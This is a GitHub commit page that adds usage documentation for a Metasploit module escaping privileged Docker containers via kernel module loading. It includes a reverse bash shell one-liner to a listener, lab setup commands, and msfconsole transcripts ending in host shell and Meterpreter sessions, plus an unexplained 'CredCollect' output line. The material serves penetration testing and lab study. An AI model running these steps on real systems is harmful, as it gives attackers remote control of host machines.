Skip to content

Commit

Permalink
Land #18519, Docker kernel module escape
Browse files Browse the repository at this point in the history
  • Loading branch information
@smcintyre-r7
smcintyre-r7 committed May 6, 2024
2 parents a048734 + fb62edb commit 47c8d72
Show file tree
Hide file tree
Showing 4 changed files with 749 additions and 429 deletions.
110 changes: 110 additions & 0 deletions ...tation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,110 @@
## Vulnerable Application

This module performs a container escape onto the host as the daemon user. It
takes advantage of the SYS_MODULE capability. If that exists and the linux
headers are available to compile on the target, then we can escape onto the host.

### Creating A Testing Environment

- Get a VM that you want to test on (or your own machine)
- Install Docker
- Run a listener (can be anything but this example will make use of the msfconsole `cmd/unix/reverse_bash` payload)
```msf
msf6 > use payload/cmd/unix/reverse_bash
msf6 payload(cmd/unix/reverse_bash) > set lhost vboxnet0
lhost => 192.168.56.1
msf6 payload(cmd/unix/reverse_bash) > generate -f raw
bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
msf6 payload(cmd/unix/reverse_bash) > exploit -z
[*] Payload Handler Started as Job 0
msf6 payload(cmd/unix/reverse_bash) >
[*] [2023.11.07-21:28:57] Started reverse TCP handler on 192.168.56.1:4444
```
- Create a privileged container (forwarding port 4444 in this example in order
to use a bind shell from the host. Container must be the same OS as host)
```bash
docker run --rm -it --cap-add SYS_MODULE ubuntu bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
```
- Inside your session, install the required packages to run. Package manager will differ to OS, for debian as an example
```bash
apt update && apt install -y gcc make kmod linux-headers-$(uname -r)
```

## Verification Steps

1. Start msfconsole
2. Get a session
3. Install required packages into session (line 30)
4. Run `use exploit/linux/local/docker_privileged_container_kernel_escape`
5. Run `set SESSION [session]`
6. Run `check`
7. Run `set PAYLOAD [payload]`
8. Run `exploit`

## Options

### KernelModuleName

The name that the kernel module will be called in the system. The default if no
name is set is "{rand(8)}"

### WritableContainerDir

A directory where we can write files inside the container (default is `/tmp/.{rand(4)}`).
This is needed to drop the payload into the container.

### ReloadKernelModule

Rebuilds and reloads kernel module if its already loaded in case of repeat runs.

## Scenarios

### Container Escape from debian linux with reverse bash

```msf
msf6 > sessions -i 1 -c "apt update && apt install -y gcc make kmod linux-headers-$(uname -r)"
[*] Running 'apt update && apt install -y gcc make kmod linux-headers-$(uname -r)' on shell session 1 (192.168.56.126)
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 1
session => 1
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
[*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444
[*] [2023.11.07-21:42:42] Creating files...
[*] [2023.11.07-21:42:43] Compiling the kernel module...
[+] [2023.11.07-21:42:43] Kernel module compiled successfully
[*] [2023.11.07-21:42:43] Loading kernel module...
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500
[*] This is CredCollect, I have the conn!
```

### Container Escape from arch linux with meterpreter

```msf
msf6 > sessions -i 2 -c "pacman -Syy --noconfirm gcc glibc make linux-headers"
[*] Running 'pacman -Syy --noconfirm gcc glibc make linux-headers' on shell session 2 (192.168.56.106)
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 2
session => 2
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set lhost vboxnet0
lhost => vboxnet0
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
[*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444
[*] [2023.11.07-21:48:41] Creating files...
[*] [2023.11.07-21:48:43] Compiling the kernel module...
[+] [2023.11.07-21:48:44] Kernel module compiled successfully
[*] [2023.11.07-21:48:44] Loading kernel module...
[*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500
[*] This is CredCollect, I have the conn!
[*] Session 4 created in the background.
```

0 comments on commit 47c8d72

Please sign in to comment.